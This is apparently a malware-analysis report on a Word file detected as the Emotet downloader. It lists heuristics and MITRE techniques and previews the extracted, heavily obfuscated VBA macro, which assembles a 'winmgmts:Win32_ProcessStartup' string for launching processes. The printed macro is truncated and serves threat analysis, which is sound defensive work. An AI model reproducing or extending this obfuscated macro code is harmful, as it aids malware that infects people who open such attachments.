MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The file is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6870539-0', strongly suggesting the Emotet family. High-severity heuristics indicate the presence of VBA macros, specifically an AutoOpen macro that uses GetObject, pointing towards an execution chain. The VBA script itself is heavily obfuscated but its structure and the heuristic firings suggest it's designed to download and execute a secondary payload, a common Emotet behavior.
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-6870539-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6870539-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 40363 bytes |
SHA-256: f650cf59b1e2de0dfaa4d0c23616256966ce8abd8aef7fe5ffd83fcef5e54c4e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "c6_9_2"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "R930_4_"
Function m6251834()
Select Case D4_1_29
Case 688262218
c_7_23 = V_311__7
J763568 = R6_27_20
i122_08 = Sgn(360664879 * Round(31576510))
Case 173336356
P_180_ = ChrB(391123801)
b5636_ = Sgn(736885294)
z18_082 = c__70031
End Select
Select Case c_404255
Case 581656549
M64_37 = i708_0
O460___5 = G_0___62
o_10___4 = Sgn(891266334 * Round(203280854))
Case 311358710
Q124_4 = ChrB(268935819)
Z7556_7_ = Sgn(149067780)
U_93__42 = z8205__
End Select
Select Case i89_671
Case 507394348
u_122_ = R15_____
i6357_43 = I60_9_8
c_96_2 = Sgn(485773637 * Round(268976496))
Case 905746370
m033_0_ = ChrB(571770796)
r_8_8_ = Sgn(419551533)
D7960_ = X3_866__
End Select
Select Case o49__0__
Case 599578729
C_36_86 = D09__23
a_98_37 = s6__1_24
C_0____ = Sgn(145854524 * Round(645023246))
Case 662752568
W182_28 = ChrB(824980585)
P088_390 = Sgn(833189019)
q06_2__3 = B_4__7_3
End Select
Select Case i3_52519
Case 487753757
J262043 = c_3_39
l44__0_4 = w846877
j13924 = Sgn(124466026 * Round(182544359))
Case 700364713
G8_3_5 = ChrB(342043838)
Z8_5049 = Sgn(18359304)
o566__9 = j07353
End Select
Select Case L_98__28
Case 221205271
j__149_ = m_5736_6
m479__22 = K_85_62_
i0_02493 = Sgn(375276563 * Round(512879290))
Case 106026920
S_737_2 = ChrB(96172308)
V8_710 = Sgn(774616089)
q4526_7_ = k3_89386
End Select
Select Case s721_3_
Case 972103209
i34_75 = s48828_5
r_3___0 = l9_8843_
Y_89_4 = Sgn(481721139 * Round(935199379))
Case 395876507
S8_939_ = ChrB(790277822)
N38373 = Sgn(690604455)
u_64_8 = V9614_2
End Select
End Function
Function S66_68_(f52_310, W_27725_)
On Error Resume Next
Select Case U1_1__61
Case 323104154
p_12_3__ = q2519_8
Y34870_9 = a_650062
R84769_ = Sgn(585655317 * Round(2646355))
Case 117269573
M96_9697 = ChrB(842849670)
D507_064 = Sgn(779710282)
V___3_ = b_108_
End Select
Select Case w0__2_
Case 83214086
f279_562 = v0____2_
i482_315 = A1131_
Z95459 = Sgn(225181066 * Round(579934180))
Case 104051638
M12_2260 = ChrB(283908048)
P17___0_ = Sgn(674758877)
z40_7_ = N22872_3
End Select
Select Case v_21___
Case 857538370
i45376_ = F8_3_7
j___7__ = U6___5_
f_40_1 = Sgn(796027065 * Round(153866615))
Case 18688584
n30441 = ChrB(24440903)
M573__8 = Sgn(88832167)
J_4___6 = o35___
End Select
k3__72_0 = (z8___0 + "winm" + "gmts:Win32") + (m23_0_ + "_ProcessStartup" + z36__4_)
Select Case I3_309
Case 991713277
w885810 = n53287
K3843___ = t__18__
Q__767 = Sgn(34261029 * Round(95784372))
Case 629873756
h72_6_ = ChrB(811919155)
i0889_04 = Sgn(699820432)
M24__6 = p3_40_
End Select
Select Case z_0842_
Case 322414876
L6_06__4 = Q_14464
H9616468 = R___50
m1___3 = Sgn(635888042 * Round(128357648))
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.